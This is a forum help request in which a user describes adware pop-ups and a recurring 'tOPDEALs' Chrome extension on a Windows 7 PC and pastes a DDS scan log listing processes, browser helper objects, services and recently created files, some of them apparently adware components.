Author Topic: [Resolved - K] Pop ups  (Read 3142 times)

Offline kobra

  • Bronze Member
  • Posts: 18
[Resolved - K] Pop ups
« on: January 17, 2015, 04:54:47 PM »
Hi, My mom was having issues with popups.  I attempted to clean the computer and have not seen anymore popups, but I noticed that a "tOPDEALs" extension was installing itself on chrome after every attempt to remove it.
I have since removed Chrome, but I want to make sure we got everything cleaned off the computer.

DDS Scan results:
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17496
Run by Admin at 15:48:11 on 2015-01-17
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.5887.4513 [GMT -7:00]
.
AV: Kaspersky Internet Security *Enabled/Updated* {179979E8-273D-D14E-0543-2861940E4886}
SP: Kaspersky Internet Security *Enabled/Updated* {ACF8980C-0107-DEC0-3FF3-1313EF89023B}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Kaspersky Internet Security *Enabled* {2FA2F8CD-6D52-D016-2E1C-81546ADD0FFD}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\atieclxx.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files (x86)\Gateway\Registration\GREGsvc.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Gateway\Gateway Updater\UpdaterService.exe
C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
C:\Users\Bonnie\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe
C:\Windows\system32\SearchIndexer.exe
C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Windows\System32\WUDFHost.exe
C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
C:\Program Files (x86)\Browny02\BrYNSvc.exe
C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avpui.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Nero\Update\NASvc.exe
C:\Windows\System32\svchost.exe -k secsvcs
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
mStart Page = www.google.com
mWinlogon: Userinit = userinit.exe,
BHO: MSS+ Identifier: {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -
BHO: {39dd84e0-d7e2-4b5c-88df-6bfebdce6716} - <orphaned>
BHO: PlusIEEventHelper Class: {551A852F-39A6-44A7-9C13-AFBEC9185A9D} - C:\Program Files (x86)\Nuance\PDF Viewer Plus\bin\PlusIEContextMenu.dll
BHO: Content Blocker Plugin: {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
BHO: Virtual Keyboard Plugin: {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Safe Money Plugin: {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\OnlineBanking\online_banking_bho.dll
BHO: {b2ba0648-6833-4057-aaa1-bf9c473dd360} - <orphaned>
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: URL Advisor Plugin: {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\UrlAdvisor\klwtbbho.dll
TB: FromDocToPDF: {c66a678d-5e6c-4af9-8f57-c6192f42cf74} -
uRun: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe /autoRun
uRunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe
uRunOnce: [ScrSav] C:\Program Files (x86)\Gateway\Screensaver\run_Gateway.exe /default
mRun: [Norton Online Backup] C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
mRun: [RemoteControl10] "C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe"
mRun: [Hotkey Utility] C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe
mRun: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [IndexSearch] "C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe"
mRun: [PaperPort PTD] "C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe"
mRun: [PPort12reminder] "C:\Program Files (x86)\Nuance\PaperPort\Ereg\Ereg.exe" -r "C:\ProgramData\ScanSoft\PaperPort\12\Config\Ereg\Ereg.ini"
mRun: [PDFHook] C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe
mRun: [PDF5 Registry Controller] C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe
mRun: [ControlCenter4] C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe /autorun
mRun: [BrStsMon00] C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe /AUTORUN
dRunOnce: [SpUninstallDeleteDir] rmdir /s /q "\SearchProtect"
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\EVENTR~1.LNK - C:\Program Files (x86)\The Print Shop 23.1\Remind.exe
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\IMAGEB~1.LNK - C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: {0C4CC089-D306-440D-9772-464E226F6539} - {0BA14598-4178-4CE5-B1F1-B5C6408A3F2E} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
IE: {CCF151D8-D089-449F-A5A4-D9909053F20F} - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\UrlAdvisor\klwtbbho.dll
DPF: {E4D88471-7ED7-43E1-B290-205559E8EBB2} - hxxps://my.madisonhospital.org/mig/mae/login/Browser%20Logoff.dll
DPF: {ECB7BFF0-FF65-11D1-9004-00A0C92E6878} - hxxps://my.madisonhospital.org/mig/mae/login/MWebEnable.dll
TCP: NameServer = 10.10.10.254
TCP: Interfaces\{18BAEE32-7A7F-4151-B2E3-CD66400E704F} : NameServer = 8.8.8.8
TCP: Interfaces\{18BAEE32-7A7F-4151-B2E3-CD66400E704F} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC} : NameServer = 8.8.8.8
TCP: Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC} : DHCPNameServer = 10.10.10.254
TCP: Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC}\C416772756E63656 : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC}\C474D2C435938303F5162363 : DHCPNameServer = 192.168.43.1
TCP: Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC}\C474D2C435938303F5560336 : DHCPNameServer = 192.168.43.1
TCP: Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC}\D496E64697C4 : DHCPNameServer = 192.168.1.1
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
x64-mStart Page = www.google.com
x64-BHO: caoupoNpEaK: {01050D05-D546-B8DC-954D-8334A8A7BF5A} -
x64-BHO: AudioCeonvaeert: {2F344960-763E-9E6C-E973-25241A34D54E} -
x64-BHO: DiscounntLoCaatOr: {39dd84e0-d7e2-4b5c-88df-6bfebdce6716} - C:\ProgramData\DiscounntLoCaatOr\4hvGyEzAwMBtBM.x64.dll
x64-BHO: Content Blocker Plugin: {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\ContentBlocker\ie_content_blocker_plugin.dll
x64-BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
x64-BHO: Virtual Keyboard Plugin: {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Safe Money Plugin: {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\OnlineBanking\online_banking_bho.dll
x64-BHO: SaoftiCoup: {b2ba0648-6833-4057-aaa1-bf9c473dd360} - C:\ProgramData\SaoftiCoup\HDwI4jNxyFjYaK.x64.dll
x64-BHO: PrinCECCoupon: {B4552D3D-6B41-9AF1-3067-72A066972344} -
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-BHO: URL Advisor Plugin: {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\UrlAdvisor\klwtbbho.dll
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-IE: {0C4CC089-D306-440D-9772-464E226F6539} - {0BA14598-4178-4CE5-B1F1-B5C6408A3F2E} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-IE: {CCF151D8-D089-449F-A5A4-D9909053F20F} - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\UrlAdvisor\klwtbbho.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-SSODL: WebCheck - <orphaned>
x64-SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
.
================= FIREFOX ===================
.
FF - ProfilePath -
.
============= SERVICES / DRIVERS ===============
.
R0 amd_sata;amd_sata;C:\Windows\System32\drivers\amd_sata.sys [2011-7-20 77952]
R0 amd_xata;amd_xata;C:\Windows\System32\drivers\amd_xata.sys [2011-7-20 37504]
R1 KLIM6;Kaspersky Anti-Virus NDIS 6 Filter;C:\Windows\System32\drivers\klim6.sys [2013-10-8 29792]
R1 klpd;klpd;C:\Windows\System32\drivers\klpd.sys [2013-4-12 15456]
R1 kltdi;kltdi;C:\Windows\System32\drivers\kltdi.sys [2013-5-14 55904]
R1 kneps;kneps;C:\Windows\System32\drivers\kneps.sys [2013-6-6 178272]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\System32\atiesrxx.exe [2011-7-20 202752]
R2 AVP;Kaspersky Anti-Virus Service;C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe [2013-10-8 214512]
R2 GREGService;GREGService;C:\Program Files (x86)\Gateway\Registration\GREGsvc.exe [2011-5-29 36456]
R2 IntuitUpdateServiceV4;Intuit Update Service v4;C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe [2013-6-28 14624]
R2 Live Updater Service;Live Updater Service;C:\Program Files\Gateway\Gateway Updater\UpdaterService.exe [2011-7-20 244624]
R2 NAUpdate;Nero Update;C:\Program Files (x86)\Nero\Update\NASvc.exe [2011-3-29 598312]
R2 NOBU;Norton Online Backup;C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2010-6-1 2804568]
R2 PDFProFiltSrvPP;PDFProFiltSrvPP;C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [2010-3-9 144672]
R3 BrYNSvc;BrYNSvc;C:\Program Files (x86)\Browny02\BrYNSvc.exe [2014-2-23 266240]
R3 klkbdflt;Kaspersky Lab KLKBDFLT;C:\Windows\System32\drivers\klkbdflt.sys [2013-10-8 29280]
R3 klmouflt;Kaspersky Lab KLMOUFLT;C:\Windows\System32\drivers\klmouflt.sys [2013-10-8 29280]
R3 netr28x;Ralink 802.11n Extensible Wireless Driver;C:\Windows\System32\drivers\netr28x.sys [2011-7-20 1014624]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2011-7-20 346144]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2014-4-11 103608]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2014-4-11 124088]
S2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service;C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [2013-12-17 46904]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-10-23 172192]
S3 GamesAppService;GamesAppService;C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe [2010-10-12 206072]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2014-12-10 114688]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\System32\drivers\rdpvideominiport.sys [2015-1-13 19456]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2015-1-13 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2015-1-13 30208]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2012-5-31 1255736]
S4 klflt;klflt;C:\Windows\System32\drivers\klflt.sys [2014-11-24 115296]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== Created Last 30 ================
.
2015-01-17 04:48:59   75888   ----a-w-   C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{2C0F3203-CF54-4F10-9682-5E58DA959B59}\offreg.dll
2015-01-17 04:04:59   11870360   ----a-w-   C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{2C0F3203-CF54-4F10-9682-5E58DA959B59}\mpengine.dll
2015-01-15 05:38:26   52224   ----a-w-   C:\Windows\SysWow64\nlaapi.dll
2015-01-15 05:37:34   6584320   ----a-w-   C:\Windows\System32\mstscax.dll
2015-01-15 05:37:34   5703168   ----a-w-   C:\Windows\SysWow64\mstscax.dll
2015-01-13 14:53:01   44544   ----a-w-   C:\Windows\System32\TsUsbGDCoInstaller.dll
2015-01-13 14:53:00   62976   ----a-w-   C:\Windows\System32\tsgqec.dll
2015-01-13 14:53:00   56832   ----a-w-   C:\Windows\System32\drivers\TsUsbFlt.sys
2015-01-13 14:53:00   53248   ----a-w-   C:\Windows\SysWow64\tsgqec.dll
2015-01-13 14:53:00   3072   ----a-w-   C:\Windows\System32\drivers\en-US\tsusbflt.sys.mui
2015-01-13 14:53:00   13824   ----a-w-   C:\Windows\System32\TsUsbRedirectionGroupPolicyControl.exe
2015-01-13 14:53:00   12800   ----a-w-   C:\Windows\System32\TsUsbRedirectionGroupPolicyExtension.dll
2015-01-13 14:52:59   855552   ----a-w-   C:\Windows\SysWow64\rdvidcrl.dll
2015-01-13 14:52:59   56832   ----a-w-   C:\Windows\System32\MsRdpWebAccess.dll
2015-01-13 14:52:59   50176   ----a-w-   C:\Windows\SysWow64\MsRdpWebAccess.dll
2015-01-13 14:52:59   420864   ----a-w-   C:\Windows\System32\wksprt.exe
2015-01-13 14:52:59   18944   ----a-w-   C:\Windows\System32\wksprtPS.dll
2015-01-13 14:52:59   17920   ----a-w-   C:\Windows\SysWow64\wksprtPS.dll
2015-01-13 14:52:59   1147392   ----a-w-   C:\Windows\System32\mstsc.exe
2015-01-13 14:52:59   1068544   ----a-w-   C:\Windows\SysWow64\mstsc.exe
2015-01-13 14:52:59   1057280   ----a-w-   C:\Windows\System32\rdvidcrl.dll
2015-01-13 14:51:54   30208   ----a-w-   C:\Windows\System32\drivers\TsUsbGD.sys
2015-01-13 14:51:54   19456   ----a-w-   C:\Windows\System32\drivers\rdpvideominiport.sys
2015-01-13 14:51:47   243200   ----a-w-   C:\Windows\System32\rdpudd.dll
2015-01-13 14:51:47   228864   ----a-w-   C:\Windows\System32\rdpendp_winip.dll
2015-01-13 14:51:47   192000   ----a-w-   C:\Windows\SysWow64\rdpendp_winip.dll
2015-01-13 04:15:36   --------   d-----w-   C:\Windows\Microsoft Antimalware
2015-01-07 16:57:55   --------   d-----w-   C:\ProgramData\pnikjcemimhgahpjiapnjbejoigfkjcj
2015-01-07 02:51:42   129752   ----a-w-   C:\Windows\System32\drivers\67F23A27.sys
2015-01-07 02:50:39   129752   ----a-w-   C:\Windows\System32\drivers\12D43959.sys
2015-01-06 04:04:08   --------   d-----w-   C:\ProgramData\DiscounntLoCaatOr
2015-01-06 04:03:38   --------   d-----w-   C:\ProgramData\SaoftiCoup
.
==================== Find3M  ====================
.
2015-01-15 06:56:12   71344   ----a-w-   C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2015-01-15 06:56:12   701616   ----a-w-   C:\Windows\SysWow64\FlashPlayerApp.exe
2015-01-15 05:38:25   129752   ----a-w-   C:\Windows\System32\drivers\MBAMSwissArmy.sys
2015-01-08 16:55:52   298120   ------w-   C:\Windows\System32\MpSigStub.exe
2014-12-19 03:06:55   210432   ----a-w-   C:\Windows\System32\profsvc.dll
2014-12-19 01:46:45   141312   ----a-w-   C:\Windows\System32\drivers\mrxdav.sys
2014-12-13 05:09:01   144384   ----a-w-   C:\Windows\System32\ieUnatt.exe
2014-12-13 03:33:44   115712   ----a-w-   C:\Windows\SysWow64\ieUnatt.exe
2014-12-12 05:35:10   5553592   ----a-w-   C:\Windows\System32\ntoskrnl.exe
2014-12-12 05:31:49   503808   ----a-w-   C:\Windows\System32\srcore.dll
2014-12-12 05:31:49   50176   ----a-w-   C:\Windows\System32\srclient.dll
2014-12-12 05:31:22   296960   ----a-w-   C:\Windows\System32\rstrui.exe
2014-12-12 05:11:44   3971512   ----a-w-   C:\Windows\SysWow64\ntkrnlpa.exe
2014-12-12 05:11:43   3916728   ----a-w-   C:\Windows\SysWow64\ntoskrnl.exe
2014-12-12 05:07:44   43008   ----a-w-   C:\Windows\SysWow64\srclient.dll
2014-12-11 17:47:17   87040   ----a-w-   C:\Windows\System32\TSWbPrxy.exe
2014-12-06 04:17:27   303616   ----a-w-   C:\Windows\System32\nlasvc.dll
2014-12-06 03:50:18   156672   ----a-w-   C:\Windows\SysWow64\ncsi.dll
2014-12-04 02:50:55   413184   ----a-w-   C:\Windows\System32\generaltel.dll
2014-12-04 02:50:45   741376   ----a-w-   C:\Windows\System32\invagent.dll
2014-12-04 02:50:40   396800   ----a-w-   C:\Windows\System32\devinv.dll
2014-12-04 02:50:38   830976   ----a-w-   C:\Windows\System32\appraiser.dll
2014-12-04 02:50:37   227328   ----a-w-   C:\Windows\System32\aepdu.dll
2014-12-04 02:50:37   192000   ----a-w-   C:\Windows\System32\aepic.dll
2014-12-04 02:44:48   1083392   ----a-w-   C:\Windows\System32\aeinv.dll
2014-12-01 23:28:44   1232040   ----a-w-   C:\Windows\System32\aitstatic.exe
2014-11-25 21:46:58   29280   ----a-w-   C:\Windows\System32\drivers\klkbdflt.sys
2014-11-25 21:46:58   178272   ----a-w-   C:\Windows\System32\drivers\kneps.sys
2014-11-25 21:46:57   458336   ----a-w-   C:\Windows\System32\drivers\kl1.sys
2014-11-25 21:46:57   115296   ----a-w-   C:\Windows\System32\drivers\klflt.sys
2014-11-22 03:06:23   2724864   ----a-w-   C:\Windows\System32\mshtml.tlb
2014-11-22 03:06:11   4096   ----a-w-   C:\Windows\System32\ieetwcollectorres.dll
2014-11-22 02:50:39   66560   ----a-w-   C:\Windows\System32\iesetup.dll
2014-11-22 02:50:10   580096   ----a-w-   C:\Windows\System32\vbscript.dll
2014-11-22 02:49:54   48640   ----a-w-   C:\Windows\System32\ieetwproxystub.dll
2014-11-22 02:48:20   88064   ----a-w-   C:\Windows\System32\MshtmlDac.dll
2014-11-22 02:35:29   114688   ----a-w-   C:\Windows\System32\ieetwcollector.exe
2014-11-22 02:34:51   814080   ----a-w-   C:\Windows\System32\jscript9diag.dll
2014-11-22 02:34:07   6039552   ----a-w-   C:\Windows\System32\jscript9.dll
2014-11-22 02:26:31   968704   ----a-w-   C:\Windows\System32\MsSpellCheckingFacility.exe
2014-11-22 02:20:44   2724864   ----a-w-   C:\Windows\SysWow64\mshtml.tlb
2014-11-22 02:14:16   77824   ----a-w-   C:\Windows\System32\JavaScriptCollectionAgent.dll
2014-11-22 02:07:43   501248   ----a-w-   C:\Windows\SysWow64\vbscript.dll
2014-11-22 02:07:17   62464   ----a-w-   C:\Windows\SysWow64\iesetup.dll
2014-11-22 02:06:32   47616   ----a-w-   C:\Windows\SysWow64\ieetwproxystub.dll
2014-11-22 02:05:02   64000   ----a-w-   C:\Windows\SysWow64\MshtmlDac.dll
2014-11-22 01:54:30   620032   ----a-w-   C:\Windows\SysWow64\jscript9diag.dll
2014-11-22 01:47:10   1359360   ----a-w-   C:\Windows\System32\mshtmlmedia.dll
2014-11-22 01:46:58   2125312   ----a-w-   C:\Windows\System32\inetcpl.cpl
2014-11-22 01:40:04   60416   ----a-w-   C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2014-11-22 01:29:26   4299264   ----a-w-   C:\Windows\SysWow64\jscript9.dll
2014-11-22 01:28:21   2358272   ----a-w-   C:\Windows\System32\wininet.dll
2014-11-22 01:22:49   2052096   ----a-w-   C:\Windows\SysWow64\inetcpl.cpl
2014-11-22 01:21:57   1155072   ----a-w-   C:\Windows\SysWow64\mshtmlmedia.dll
2014-11-22 01:00:20   1888256   ----a-w-   C:\Windows\SysWow64\wininet.dll
2014-11-21 13:14:22   63704   ----a-w-   C:\Windows\System32\drivers\mwac.sys
2014-11-21 13:14:12   93400   ----a-w-   C:\Windows\System32\drivers\mbamchameleon.sys
2014-11-21 13:14:08   25816   ----a-w-   C:\Windows\System32\drivers\mbam.sys
2014-11-19 11:31:16   1217192   ----a-w-   C:\Windows\SysWow64\FM20.DLL
2014-11-11 03:09:06   1424384   ----a-w-   C:\Windows\System32\WindowsCodecs.dll
2014-11-11 03:08:52   241152   ----a-w-   C:\Windows\System32\pku2u.dll
2014-11-11 03:08:48   728064   ----a-w-   C:\Windows\System32\kerberos.dll
2014-11-11 02:44:45   1230336   ----a-w-   C:\Windows\SysWow64\WindowsCodecs.dll
2014-11-11 02:44:32   186880   ----a-w-   C:\Windows\SysWow64\pku2u.dll
2014-11-11 02:44:25   550912   ----a-w-   C:\Windows\SysWow64\kerberos.dll
2014-11-11 01:46:26   119296   ----a-w-   C:\Windows\System32\drivers\tdx.sys
2014-11-08 03:16:08   2048   ----a-w-   C:\Windows\System32\tzres.dll
2014-11-08 02:45:09   2048   ----a-w-   C:\Windows\SysWow64\tzres.dll
2014-10-30 02:03:43   165888   ----a-w-   C:\Windows\System32\charmap.exe
2014-10-30 01:45:43   155136   ----a-w-   C:\Windows\SysWow64\charmap.exe
2014-10-25 01:57:59   77824   ----a-w-   C:\Windows\System32\packager.dll
2014-10-25 01:32:37   67584   ----a-w-   C:\Windows\SysWow64\packager.dll
.
============= FINISH: 15:48:48.50 ===============


Attach.txt results:
.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 7 Home Premium
Boot Device: \Device\HarddiskVolume2
Install Date: 5/29/2012 5:19:30 AM
System Uptime: 1/17/2015 12:50:31 PM (3 hours ago)
.
Motherboard: Gateway |  | DX4350
